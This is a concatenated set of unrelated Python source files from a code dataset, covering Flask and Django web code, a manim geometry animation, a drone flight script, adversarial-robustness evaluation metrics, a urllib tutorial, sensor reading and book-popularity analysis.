print("查询 % r 完成" % user.__repr__)
return result
# 删
def delete_object(user):
result = user.query.filter(user.username == '11111').all()
db.session.delete(result)
db.session.commit()
#改
def update_object(user):
result = user.query.filter(user.username == '111111').all()
result.title = 'success2018'
|
15,940 | c236c12e50caac63526242e6e31376ba219fdaf9 | from .decorators import captchaform
from . import settings
# A simple shortcut/"default" field name for the captcha
captcha = captchaform(settings.DEFAULT_FIELD_NAME)
|
15,941 | 5088a387dd1abc225a24cece252095c2b77e446d | from flask import Flask, request, make_response
from verify_email import VerifyEmail
import json
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello World!'
'''
Http请求方式 POST
Content-Type application/json
传参格式(Http流传输):
[
"zhzhi2008@126.com",
"529781013@qq.com",
"2121kk@toytoystimple.net"
]
'''
@app.route('/verify/email', methods=['POST'])
def verify_email():
data = request.stream.read()
v = VerifyEmail(json.loads(data))
list = v.verify()
resp = make_response(json.dumps(list))
resp.headers['content-type'] = 'application/json'
return resp
@app.route('/verify/wrongemail', methods=['POST'])
def wrong_demain():
data = request.stream.read()
v = VerifyEmail(json.loads(data))
list = v.wrong_demain()
resp = make_response(json.dumps(list))
resp.headers['content-type'] = 'application/json'
return resp
if __name__ == '__main__':
app.run()
|
15,942 | d0cd6f49f2dc7fe56fb7efc7baa42caaab7fce09 | # _*_ coding utf-8 _*_
# __author: Jason
# Date: 2018/12/20
'''
按逗号分隔列表。
'''
L = [1,2,3,4,5]
#利用JOIN将通过迭代器生成的字符串进行拼接
s1 = ','.join(str(n) for n in L)
print(s1)
print(type(s1))
L = [1, 2, 3, 4, 5]
L = repr(L)[1:-1]
print(L)
print(type(L)) |
15,943 | b64e9fea26ec95f03db1e430f8bdc38f8c5d31a3 | # from @cigar666
"""
注:
1. 主要用来求解两圆和多圆相交的交集部分的示意(如果是空集会出问题)
2. Intersection_n_circle是没有基于前两个类的,其实就用它也就行了
3. 可以用来做一些类似文氏图之类的,其他凸区域的交集可使用类似的方法写出来(如果谁有兴趣可以写一下)
"""
from manimlib.imports import *
class Irregular_shape(VMobject):
def __init__(self, *curves, **kwargs):
VMobject.__init__(self, **kwargs)
vertices = []
for curve in curves:
vertices += list(curve)
self.set_points_as_corners(
[*vertices, vertices[0]]
)
class Intersection_2circle(Irregular_shape):
def __init__(self, Mcircle_1, Mcircle_2, num=360, **kwargs):
def p_in_circle(p, circle_o, circle_r):
return (sum((p - circle_o) ** 2) <= circle_r ** 2)
r1, r2 = Mcircle_1.get_height()/2, Mcircle_2.get_height()/2
o1, o2 = Mcircle_1.get_center(), Mcircle_2.get_center()
arc1, arc2 = [], []
t = np.linspace(0, 2 * np.pi, num)
# for p in [np.array([np.cos(t[i]), np.sin(t[i]), 0]) * r1 + o1 for i in range(len(t))]:
# if p_in_circle(p, o2, r2):
# arc1.append(p)
# for p in [np.array([np.cos(t[i]), np.sin(t[i]), 0]) * r2 + o2 for i in range(len(t))]:
# if p_in_circle(p, o1, r1):
# arc2.append(p)
for i in range(len(t)):
p1 = np.array([np.cos(t[i]), np.sin(t[i]), 0]) * r1 + o1
if p_in_circle(p1, o2, r2):
arc1.append(p1)
p2 = np.array([np.cos(t[i]), np.sin(t[i]), 0]) * r2 + o2
if p_in_circle(p2, o1, r1):
arc1.append(p2)
Irregular_shape.__init__(self, arc1, arc2, **kwargs)
class Intersection_n_circle(VMobject):
def __init__(self, *Mcircle, num=360, **kwargs):
def p_in_circle(p, circle_o, circle_r):
return (sum((p - circle_o) ** 2) <= circle_r ** 2)
r_list = [c.get_height()/2 for c in Mcircle]
o_list = [c.get_center() for c in Mcircle]
arc_list = [[] for c in Mcircle]
t = np.linspace(0, 2 * np.pi, num)
for i in range(len(t)):
for j in range(len(arc_list)):
p = np.array([np.cos(t[i]), np.sin(t[i]), 0]) * r_list[j] + o_list[j]
p_in = True
for k in range(len(arc_list)):
p_in = p_in and p_in_circle(p, o_list[k], r_list[k])
if p_in:
arc_list[j].append(p)
vertices = []
for arc in arc_list:
vertices += arc
VMobject.__init__(self, **kwargs)
n_v = len(vertices)
v_arr = np.array(vertices)
center = sum(v_arr)/n_v
angle = []
def get_angle(vector):
if vector[1] >= 0:
return np.arccos(vector[0]/np.sqrt(sum(vector ** 2)))
else:
return 2 * np.pi - np.arccos(vector[0]/np.sqrt(sum(vector ** 2)))
for v in vertices:
angle_i = get_angle(v - center)
angle.append(angle_i)
order = np.argsort(np.array(angle))
vertices_in_order = list(np.zeros((n_v, 3)))
for i in range(n_v):
vertices_in_order[i] = vertices[order[i]]
self.set_points_as_corners(
[*vertices_in_order, vertices_in_order[0]]
)
## some tests ##
class Test_2cirlces(Scene):
def construct(self):
circle_1 = Circle().scale(2).shift(LEFT * 1.5)
circle_2 = Circle().scale(1.5).shift(RIGHT * 1 + DOWN * 1.2)
intersection = Intersection_2circle(circle_1, circle_2, color=YELLOW, fill_color=YELLOW)
self.play(ShowCreation(circle_1))
self.play(ShowCreation(circle_2))
self.wait()
self.play(ShowCreation(intersection), run_time=2)
self.wait(0.5)
self.play(ApplyMethod(intersection.set_opacity, 0.8))
self.wait(2)
self.play(FadeOut(intersection))
self.wait(0.5)
circle_3 = Circle().scale(1.8).shift(UP * 1. + LEFT * 0.4)
intersection_3c = Intersection_n_circle(circle_1, circle_2, circle_3, color=YELLOW, fill_color=YELLOW)
self.play(ShowCreation(circle_3))
self.wait()
self.play(ShowCreation(intersection_3c), run_time=2)
self.wait()
self.play(ApplyMethod(intersection_3c.set_opacity, 1))
self.wait(4)
class N_circles(Scene):
def construct(self):
circles = VGroup()
circles.add(Circle(radius=2).shift(LEFT * 2))
circles.add(Circle(radius=1.5).shift(LEFT * 1))
circles.add(Circle(radius=2).shift(UP * 1.8 + RIGHT * 0.5))
circles.add(Circle(radius=3).shift(RIGHT * 2 + DOWN * 0.5))
circles.add(Circle(radius=2).shift(DOWN * 1))
circles.add(Circle(radius=2.4).shift(LEFT * 1.2 + UP * 2.4))
for i in range(len(circles)):
self.play(ShowCreation(circles[i]), run_time=1)
self.wait(0.5)
intersection = Intersection_n_circle(*circles, color=YELLOW)
self.wait(0.5)
self.play(ShowCreation(intersection), run_time=2)
self.wait()
self.play(ApplyMethod(intersection.set_opacity, 0.8))
self.wait(4)
class Four_circles(Scene):
def construct(self):
circle_1 = Circle(radius=2).shift(UP + LEFT)
circle_2 = Circle(radius=2).shift(-UP + LEFT)
circle_3 = Circle(radius=2).shift(UP - LEFT)
circle_4 = Circle(radius=2).shift(-UP - LEFT)
intersection_1234 = Intersection_n_circle(circle_1, circle_2, circle_3, circle_4,
color=YELLOW, fill_opacity=0.6, fill_color=YELLOW)
intersection_14 = Intersection_n_circle(circle_1, circle_4, color=YELLOW, fill_opacity=0.6, fill_color=YELLOW)
self.add(circle_1, circle_2, circle_3, circle_4)
self.wait()
self.play(ShowCreation(intersection_14))
self.wait()
self.play(ReplacementTransform(intersection_14, intersection_1234))
self.wait(2)
|
15,944 | f2373b372abad41cc6a9bf4237c692bb7fe155bd | # -*- coding: UTF-8 -*-
import olympe
from olympe.messages.ardrone3.Piloting import TakeOff, moveBy, Landing, NavigateHome, moveTo
import olympe_deps as od
from olympe.messages.ardrone3.PilotingState import FlyingStateChanged
from olympe.messages.camera import take_photo, set_camera_mode, set_photo_mode, photo_progress
from olympe.messages.gimbal import set_target
from olympe.messages.ardrone3.GPSSettings import SetHome
from PIL import Image
import math
import sys
import requests
homeLatitude = 48.87890000000001
homeLongitude = 2.3677799999999998
homeAltitude = 3.0
entranceLatitude = 48.879031563239856
entranceLongitude = 2.367685713676506
entranceAltitude = 0.9825900793075562
# Drone IP
ANAFI_IP = "10.202.0.1"
drone = olympe.Drone(ANAFI_IP)
# Get argument
destination = sys.argv[1]
def goToEntrance():
print("Going to entrance")
##Go up
drone(
moveBy(0, 0, -5, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
##Go to entrance
drone(
moveTo(latitude=entranceLatitude, longitude=entranceLongitude,altitude=5, orientation_mode=0, heading=0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
drone(
moveTo(latitude=entranceLatitude, longitude=entranceLongitude,altitude=entranceAltitude, orientation_mode=0, heading=0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
return
def goToHome():
print("Going to HOME")
drone(
moveBy(0, 0, -5, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
drone(
moveTo(latitude=homeLatitude, longitude=homeLongitude,altitude=homeAltitude, orientation_mode=0, heading=0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
return
def goToDestination(destination):
if(destination == "A1"):
goToEntrance()
drone(
moveBy(4.93, 0, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToHome()
elif(destination == "A2"):
goToEntrance()
drone(
moveBy(0, 2.3, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
drone(
moveBy(4.93, 0, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToHome()
elif(destination == "A3"):
goToEntrance()
drone(
moveBy(0, 4.8, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
drone(
moveBy(4.93, 0, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToHome()
elif(destination == "A4"):
goToEntrance()
drone(
moveBy(0, 7.1, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
drone(
moveBy(4.93, 0, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToHome()
elif(destination == "A5"):
goToEntrance()
drone(
moveBy(0, 9.5, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
drone(
moveBy(4.93, 0, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToHome()
elif(destination == "A6"):
goToEntrance()
drone(
moveBy(0, 12, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
drone(
moveBy(4.93, 0, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToHome()
elif(destination == "B1"):
goToEntrance()
drone(
moveBy(-4.93, 0, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToHome()
elif(destination == "B2"):
goToEntrance()
drone(
moveBy(0, 2.3, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
drone(
moveBy(-4.93, 0, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToHome()
elif(destination == "B3"):
goToEntrance()
drone(
moveBy(0, 4.8, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
drone(
moveBy(-4.93, 0, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToHome()
elif(destination == "B4"):
goToEntrance()
drone(
moveBy(0, 7.1, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
drone(
moveBy(-4.93, 0, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToHome()
elif(destination == "B5"):
goToEntrance()
drone(
moveBy(0, 9.5, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
drone(
moveBy(-4.93, 0, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToHome()
elif(destination == "B6"):
goToEntrance()
drone(
moveBy(0, 12, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
drone(
moveBy(-4.93, 0, 0, 0)
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToHome()
return
print("Destination: " + destination)
drone.connection()
drone(
TakeOff()
>> FlyingStateChanged(state="hovering", _timeout=5)
).wait()
goToDestination(destination)
drone(Landing()).wait()
drone.disconnection()
|
15,945 | ce8b50c49b67596f39e3e2ebf1e97ff86b1d0911 | from foolbox.distances import LpDistance
import numpy as np
import eagerpy as ep
from math import ceil
import pandas as pd
from attack.criteria import TargetedMisclassification
import torch
# Here defines the maximum allowed batch size:
MAX_BATCH = 128
def collect_attack_search_statistics(trials):
typect = {}
for trial in trials:
att_type = type(trial[0]['attack'])
if att_type not in typect:
typect[att_type] = 1
else:
typect[att_type] += 1
return typect
def collect_scores(trials):
score_dict = {}
for trial in trials:
att_type = type(trial[0]['attack'])
if att_type not in score_dict:
score_dict[att_type] = [trial[2]]
else:
score_dict[att_type].append(trial[2])
return score_dict
def collect_scores_df(trials):
attack_list = []
score_list = []
for trial in trials:
att_type = type(trial[0]['attack'])
attack_list.append(att_type.name())
score_list.append(trial[2])
return pd.DataFrame({"attack": attack_list, "score": score_list})
def collect_param_scores_df(trials):
attack_list = []
score_list = []
param_list = []
for trial in trials:
att_type = type(trial[0]['attack'])
trial[0].pop('attack')
attack_list.append(att_type.name())
score_list.append(trial[2])
param_list.append(trial[0])
return pd.DataFrame({"attack": attack_list, "score": score_list, 'param': param_list})
def get_progression(trials):
individual_list = []
progress_list = []
curr_max = -100
for trial in trials:
individual_list.append(trial[2])
curr_max = max(curr_max, trial[2])
progress_list.append(curr_max)
return individual_list, progress_list
def misclassification_criterion(instance, adv_imgs, labels, detector=False):
"""
Misclassification Criterion function
"""
adv_pred, adv_det = instance.predict(torch.clamp(adv_imgs, 0, 1))
robust_acc_bool = torch.argmax(adv_pred, dim=1).eq(labels.to(instance.device))
is_adv_det_bool = ~robust_acc_bool & adv_det
if detector:
return is_adv_det_bool, adv_det
else:
return is_adv_det_bool
def misclassification_criterion_acc_check(instance, adv_imgs, labels, imgs):
"""
This method is for detectors to remove false-negative samples
if no detector, it is the same as misclassification_criterion
Check if the adv_imgs are misclassified adversarial
"""
pred, det = instance.predict(imgs)
acc_bool = torch.argmax(pred, dim=1).eq(labels.to(instance.device))
acc_det_bool = acc_bool & det
return ~acc_det_bool | misclassification_criterion(instance, adv_imgs, labels)
def misclassification_criterion_rerr(instance, adv_imgs, labels, imgs):
"""
This method is for detectors to remove false-negative samples
if no detector, it is the same as misclassification_criterion
Check if the adv_imgs are misclassified adversarial
"""
pred, det = instance.predict(imgs)
acc_err_bool = ~torch.argmax(pred, dim=1).eq(labels.to(instance.device)) & det
adv_pred, adv_det = instance.predict(torch.clamp(adv_imgs, 0, 1))
robust_err_bool = ~torch.argmax(adv_pred, dim=1).eq(labels.to(instance.device)) & adv_det
mask = det | adv_det
err = acc_err_bool | robust_err_bool
return err, mask
def get_acc_robust_disturbance(instance, imgs, adv_imgs, labels, norm=ep.inf, verbose=False):
"""
Return a list: [accuracy, rerr, disturbance, robustness, loss]
"""
adv_imgs = adv_imgs.clone()
# deal with nan in the image.
if (torch.isnan(adv_imgs).any()):
print("There is nan is the adversarial image, will fill nan pixels with the original img")
mask = torch.isnan(adv_imgs)
adv_imgs[mask] = 0
adv_imgs = mask*imgs + adv_imgs
assert(not torch.isnan(adv_imgs).any())
pred, det = instance.predict(imgs)
pred2, det = instance.predict(imgs)
is_random = not pred.eq(pred2).all()
acc_bool = torch.argmax(pred, dim=1).eq(labels.to(instance.device))
det_bool = acc_bool & det
acc_err_bool = ~torch.argmax(pred, dim=1).eq(labels.to(instance.device)) & det
raw_accuracy = float(torch.sum(acc_bool.to(torch.float32)) / len(labels))
det_accuracy = float(torch.sum(det_bool.to(torch.float32)) / len(labels))
adv_pred, adv_det = instance.predict(torch.clamp(adv_imgs, 0, 1))
predsoft = adv_pred.softmax(dim=1)
ce_loss = -(predsoft[np.arange(labels.shape[0]), labels]+0.001).log() # 0.001 to avoid extreme values
if not is_random:
robust_err_bool = ~torch.argmax(adv_pred, dim=1).eq(labels.to(instance.device)) & adv_det
mask = det | adv_det
err_bool = acc_err_bool | robust_err_bool
num_adv = float(torch.sum(err_bool.to(torch.float32)))
else:
num_adv = 0
mask = det | adv_det
for _ in range(10):
adv_pred, adv_det = instance.predict(torch.clamp(adv_imgs, 0, 1))
robust_err_bool = ~torch.argmax(adv_pred, dim=1).eq(labels.to(instance.device)) & adv_det
err_bool = acc_err_bool | robust_err_bool
num_adv += float(torch.sum(err_bool.to(torch.float32)))/10
remain_list = []
for i in range(len(labels)):
if det_bool[i]:
remain_list.append(i)
adv_imgs_r = adv_imgs[remain_list, :]
imgs_r = imgs[remain_list, :]
rerr = num_adv / float(torch.sum(mask))
det_attack_accuracy = num_adv / len(labels)
network_robustness = 1 - rerr
ce_loss = float(torch.mean(ce_loss))
assert(len(adv_imgs_r) == len(imgs_r))
disturbance = get_disturbance(imgs_r, adv_imgs_r, norm)
if verbose:
print("Raw accuracy is: {:.2f}%".format(raw_accuracy*100))
print("Detector accuracy is: {:.2f}%".format(det_accuracy*100))
print("Robustness error rate is: {:.2f}%".format(rerr*100))
print("Detector attack success rate is: {:.2f}%".format(det_attack_accuracy*100))
print("Robustness of the network is: {:.2f}%".format(network_robustness*100))
print("The average {:.1f} norm disturbance is: {:.4f}".format(norm, disturbance))
print("Untargeted CE loss is {:.3f}".format(ce_loss))
result = [det_accuracy*100, rerr*100, disturbance, network_robustness*100, ce_loss]
return result
def get_disturbance(x, y, norm):
linf = LpDistance(norm)
batch_eps = linf(x, y)
return float(torch.mean(batch_eps))
def print_eval_result(evals):
print("The accuracy of the network is {:.3f}%".format(evals[0]))
print("The robustness of the network is {:.3f}%".format(evals[1]))
print("The ASR of the attack is {:.3f}%".format(evals[2]))
print("Attack time used is {:.3f}s".format(evals[3]))
print("Total time used is {:.3f}s".format(evals[4]))
print()
def batch_is_adv(model, adv_imgs, labels):
pred = batch_forward(model, adv_imgs)
if isinstance(labels, TargetedMisclassification):
is_adv = torch.argmax(pred, dim=1).eq(labels.target_classes.raw)
else:
is_adv = torch.argmax(pred, dim=1).ne(labels)
return is_adv
def batch_forward(model, images, max_batch=MAX_BATCH):
"""
Batched version of the forward function
"""
N = images.shape[0]
nbatchs = ceil(N / max_batch)
pred_list = []
with torch.no_grad():
for i in range(nbatchs):
pred_list.append(model(images[i * max_batch: (i + 1) * max_batch]))
return torch.cat(pred_list, dim=0)
|
15,946 | 54332ff9eed2cd36b601ce0409faf64be849f64f | """ User serializers """
# Django REST Framework
from rest_framework import serializers
# Models
from valoracion.users.models import User
class UserModelSerializer(serializers.ModelSerializer):
""" User model serializer """
email = serializers.EmailField(required=True)
username = serializers.CharField()
first_name = serializers.CharField()
last_name = serializers.CharField()
phone_number = serializers.CharField(max_length=17)
class Meta:
""" Meta Class """
model = User
fields = (
'id', 'email', 'username', 'first_name', 'last_name', 'phone_number'
) |
15,947 | cb2705b1f286b1998f9e87625e989769c51f473a | from urllib.parse import urlparse, urlunparse, urlsplit, urlunsplit, urljoin, urlencode, parse_qs, parse_qsl, quote, \
unquote
"""1. urlparse()"""
# urllib.parse.urlparse(urlstring, scheme='', allow_fragments=True)
# scheme://netloc/path;params?query#fragment
# scheme only works when no scheme specified in URL
# allow_fragments set to False causes it parsed as part of path/para/query
result = urlparse('https://www.baidu.com/index.html;user?id=5#comment')
print(type(result), result)
"""2. urlunparse()"""
# construct url
# argument length must be 6
data = ['http', 'www.baidu.com', 'index.html', 'user', 'a=6', 'comment']
print(urlunparse(data))
"""3. urlsplit()"""
# return tuple/SplitResult object
result = urlsplit('http://www.baidu.com/index.html;user?id=5#comment')
print(result, result.scheme, result[0], sep='\n')
"""4. urlunsplit()"""
# construct url
# argument length must be 5
data = ['http', 'www.baidu.com', 'index.html', 'a=6', 'comment']
print(urlunsplit(data))
"""5. urljoin()"""
# construct url using base_url and target_url
# base_url only provides: scheme, netloc, path as reference
print(urljoin('http://www.baidu.com', 'FAQ.html'))
print(urljoin('http://www.baidu.com/about.html', 'https://sb.com/FAQ.html'))
print(urljoin('http://www.baidu.com?wd=abc', 'https://sb.com/FAQ.html?question=2'))
print(urljoin('http://www.baidu.com', '?category=2#comment'))
print(urljoin('http://www.baidu.com#comment', '?category=2'))
"""6. urlencode()"""
# construct request args of GET method
params = {
'name': 'germey',
'age': 22
}
base_url = 'http://www.baidu.com?'
url = base_url + urlencode(params)
print(url)
"""7. parse_qs()"""
# deserialization
query = 'name=germey&age=22'
print(parse_qs(query))
"""8. parse_qsl()"""
# convert to tuple list
query = 'name=germey&age=22'
print(parse_qsl(query))
"""9. quote()"""
# convert content to URL encoded format
keyword = '壁纸'
url = 'https://www.baidu.com/s?wd=' + quote(keyword)
print(url)
"""10. unquote()"""
# decode URL
url = "https://www.baidu.com/s?wd=%E5%A3%81%E7%BA%B8"
print(unquote(url))
|
15,948 | 5f649a8733879ea04830ee1024492d6848b66abc | from django.db import models
from django.conf import settings
import uuid
from django.contrib.auth.models import User
from django.utils.timezone import now
# Create your models here.
class RegistrationToken(models.Model):
token = models.UUIDField(default=uuid.uuid4)
created_at = models.DateTimeField(auto_now=True)
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
# класс ошибки обознчающей, что срок действия токена истёк
class Expired(Exception): pass
# проверка, что токен истёк: находим разницу между двумя датами,
# переводим её в часы и сравниваем с допустимым возрастом токена в часах,
# указанным в настройках.
def is_expired(self):
delta = now() - self.created_at
delta_hours = delta.total_seconds() / 3600
return delta_hours > settings.TOKEN_EXPIRATION_HOURS
def __str__(self):
return "%s" % self.token
class SoftDeleteManager(models.Manager):
def active(self):
return self.filter(is_deleted=False)
def deleted(self):
return self.filter(is_deleted=True)
class Product(models.Model):
name = models.CharField(max_length=255)
description = models.TextField(max_length=2000, null=True, blank=True)
arrival_date = models.DateTimeField(verbose_name="Время создания")
is_deleted = models.BooleanField(default=False)
categories = models.ManyToManyField('Category', related_name="product", blank=True, verbose_name="Категория")
price = models.DecimalField(max_digits=10, decimal_places=2)
objects = SoftDeleteManager()
def __str__(self):
return self.name
class Category(models.Model):
name = models.CharField(max_length=255, verbose_name="Категория")
description = models.TextField(max_length=2000, null=True, blank=True, verbose_name="Описание")
def __str__(self):
return self.name
class Product_photo(models.Model):
product = models.ForeignKey(Product, related_name="images", verbose_name="Фото продукта", on_delete=models.PROTECT)
images = models.ImageField(upload_to='images', null=True, blank=True)
class Order(models.Model):
user = models.ForeignKey(User, related_name="order", verbose_name="Пользователь", on_delete=models.PROTECT)
products = models.ManyToManyField('Product', related_name="order", verbose_name="Продукты")
phone = models.CharField(max_length=255, verbose_name="Телефон")
address = models.CharField(max_length=255, verbose_name="Адрес", null=True, blank=True)
comment = models.TextField(max_length=2000, null=True, blank=True, verbose_name="Комментарий")
created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время создания')
|
15,949 | 6716acabb6389ff4dd37a50cf0afbf67422a6298 | import json
from pprint import pprint
from string import Template
from presentation import generate_template
def calculateLikesFrom(likesDict, username):
for user, likeCount in likesDict.iteritems():
if user == username:
return likeCount
return 0
def extractFirstName(s):
res = s.split('*')[0].split('/')[-1]
return str(res)
def extractSecondName(s):
res = s.split('*')[2].split('.')[0]
return str(res)
###############################################################
def convertJsonToLikesTable(jsonPath, likesTablePath):
with open(jsonPath) as data_file:
data = json.load(data_file)
username = data['username']
print "Convert json data for " + username + "..."
userLikes = {}
photos = data['photos']
for photo in photos:
likes = photo['likes']
for like in likes:
like_by = str(like['username'])
if like_by in userLikes:
userLikes[like_by] += 1
else:
userLikes[like_by] = 1
oo = open(likesTablePath, "w")
for user, likeCount in userLikes.iteritems():
oo.write(str(user) + ',' + str(likeCount) + '\n')
oo.close()
def calculateMutualLikes(whoLikes, whomLikes, output):
whoLikesFile = open(whoLikes)
whomLikesFile = open(whomLikes)
outputFile = open(output, "w")
likes_dict = {}
for line in whomLikesFile:
(user, like_count) = line.split(",")
likes_dict[user] = int(like_count)
username = whoLikesFile.name.split('.')[0]
likes = calculateLikesFrom(likes_dict, username)
outputFile.write(str(likes))
whoLikesFile.close()
whomLikesFile.close()
outputFile.close()
def calcStatistics(likesCountFiles, output):
usersSet = set()
for f in likesCountFiles:
usersSet.add(extractFirstName(f))
usersList = list(usersSet)
peoples_count = len(usersList)
userMapping = {}
for i in xrange(peoples_count):
userMapping[usersList[i]] = i
data = [[0 for i in xrange(peoples_count)] for j in xrange(peoples_count)]
for f in likesCountFiles:
ii = open(f)
likes = int(ii.read())
ii.close()
whoLikes = extractFirstName(f)
whomLikes = extractSecondName(f)
data[userMapping[whoLikes]][userMapping[whomLikes]] = likes
generate_template(data, usersList, output) |
15,950 | 10b72df1eff861e6eb3a6ce446adda231d054d9c | from machine import Pin
from onewire import OneWire
from ds18x20 import DS18X20
from time import sleep
class tempSensorDS:
def __init__(self, pin_nb):
self.pin = Pin(pin_nb, Pin.IN)
self.ow = DS18X20(OneWire(self.pin))
self.ds_sensor = self.scan()
def scan(self):
try:
return self.ow.scan()[0]
except IndexError:
print('ERR: No DS sensors found.')
exit(0)
def measure_temp(self, delay=0.75):
self.ow.convert_temp()
sleep(delay)
return self.ow.read_temp(self.ds_sensor) |
15,951 | 8c0e722951de6173e3aa1d5f3401153b41050b63 | def artifact_removal(self, csp, info, layout):
print("This CLI will help you remove features that look like artifacts.")
print("Please enter an integer number (starting from 0) for each of the patterns you would like to drop.")
print("Once you are done, enter a negative integer")
drops = []
while 1:
csp.plot_patterns(info, layout=layout)
print("Please select which features to drop [band/component]: ")
drop = int(input())
if drop < 0:
return drops
else:
drops.append(drop) |
15,952 | b8c632ef4b69bc0a15142fc8057c607e1751e58c | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat May 8 15:03:25 2021
@author: Moritz
"""
# for every itemID, a popularity score is calculated based on clicks, basket, and orders
# Additonally, the main topic and popularity rank for the main topic is added as an item attribute.
# Look at data frame "df" for the popularity score, and the matrix "mat" for the co-occurences.
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
path = "/media/Moritz/080FFDFF509A959E/BWsync_share/Master_BW/Data Mining Cup/code_and_data/"
items = pd.read_csv(path + "items.csv", sep = "|")
T = pd.read_csv(path + "transactions.csv", sep = "|")
#%%
#df = pd.DataFrame(columns = ["itemID", "clicks", "basket", "orders", "pop", "main topic", "rank_main_topic"])
tid = np.sort(T["itemID"].unique())
def length(x):
if type(x) == str:
return len(x)
else:
return None
def cut_main_topic(x):
# Most books have a main topic consisting of 2-4 characters,
# which is why the 5th or 6th chars are simply ignored.
try:
if len(x) > 4:
return x[0:4]
else:
return x
except:
pass
df = items.loc[items["itemID"].isin(tid)]
df = df[["itemID", "main topic"]]
df["main topic"] = items.loc[items["itemID"].isin(tid)]["main topic"].apply(lambda x: cut_main_topic(x))
#%%
# simple way, summing up all orders, basket addition and clicks
#df = df.merge(T.groupby("itemID").sum()[["click","basket","order"]],
# left_on = "itemID", right_on = "itemID", how = "inner")
# more realistic: In one session, only count the "most important" action: order > basket > click
def metric(x):
if x[2] > 0:
return [0,0,x[2]]
elif x[1] > 0:
return [0,x[1],0]
else:
return [x[0],0,0]
T_grouped = T.groupby(["itemID","sessionID"]).sum()
m = T_grouped.apply(lambda x: metric(x), axis = 1).values
click = np.zeros((len(T),))
basket = np.zeros((len(T),))
order = np.zeros((len(T),))
for i in range(len(T)):
click[i], basket[i], order[i] = m[i]
T_grouped["click"] = click
T_grouped["basket"] = basket
T_grouped["order"] = order
df = df.merge(T_grouped.groupby("itemID").sum(), left_on = "itemID", right_on = "itemID", how = "inner")
#%% popularity score
def pop(x, a, b, c):
return a * x[0] + b * x[1] + c * x[2]
a = 1
b = 5 # maybe higher? almost like bought..
c = 10
df["pop"] = df[["click", "basket", "order"]].apply(lambda x: pop(x, a, b, c), axis = 1)
def rank_by_topic(x, df):
return sum(df.loc[df["main topic"] == x[0]]["pop"] > x[1]) + 1
df["rank_main_topic"] = df[["main topic", "pop"]].apply(lambda x: rank_by_topic(x,df), axis = 1)
df_all_books = items[["itemID"]]
df_all_books = df_all_books.merge(df[["itemID","pop","rank_main_topic"]], how = "left", on = "itemID")
df_all_books.to_csv("/media/Moritz/080FFDFF509A959E/BWsync_share/Master_BW/Data Mining Cup/code_and_data/items_popularity.csv", sep = "|")
#%%
# most popular books:
print("Most popular books:")
print("")
best = df.sort_values(by = "pop", ascending = False)["itemID"].head()
print(items.loc[items["itemID"].isin(best)]["title"])
# most popular books in the categories ...
best = df.loc[df["main topic"] == "FM"].sort_values(by = "pop", ascending = False)[["itemID", "pop", "order", "basket", "click"]].head()
best = best.merge(items.loc[items["itemID"].isin(best["itemID"])][["itemID","title"]], on = "itemID")
#%% co-occurence matrix
mat = np.zeros((len(tid), len(tid)), dtype = "int64")
T.groupby("sessionID").count()
for sid in T["sessionID"].unique():
data = T[T["sessionID"] == sid]
if len(data) > 1:
for k in range(len(data)):
for l in range(len(data)):
mat[np.where(tid == data.iloc[k]["itemID"])[0][0]][np.where(tid == data.iloc[l]["itemID"])[0][0]] += 1
for i in range(len(tid)):
mat[i][i] = 0
#%% illustration of co-occurence matrix
np.where(mat == np.max(mat))
a = items[items["itemID"] == tid[725]]
b = items[items["itemID"] == tid[14744]]
n_occ = np.sum(mat, axis = 1)/2
np.max(n_occ)
plt.boxplot(n_occ)
sum(n_occ > 0) #14471 books co-occur with at least once with other book
#TODO! Why are there odd rowsums?
#sum(mat[1])
#sids = T[T["itemID"] == 30277]["sessionID"].values
#T[T["sessionID"].isin(sids)]
# indexes for itemID 30277:
#sum((mat[np.where(tid == 30277)] > 0)[0])
|
15,953 | d73c77e327197260d1316f2ba06f33386c485b96 | from django.shortcuts import render
from django.shortcuts import get_object_or_404
from rest_framework import status, response, views
from foundations.models import Sensor
from sensor.serializers import SensorRetrieveSerializer
def sensor_retrieve_page(request, id):
return render(request, "sensor/retrieve.html", {
'id': id,
})
class SensorRetrieveAPI(views.APIView):
def get(self, request, id):
sensor = get_object_or_404(Sensor, id=int(id))
serializer = SensorRetrieveSerializer(sensor)
return response.Response(
status=status.HTTP_200_OK,
data=serializer.data
)
|
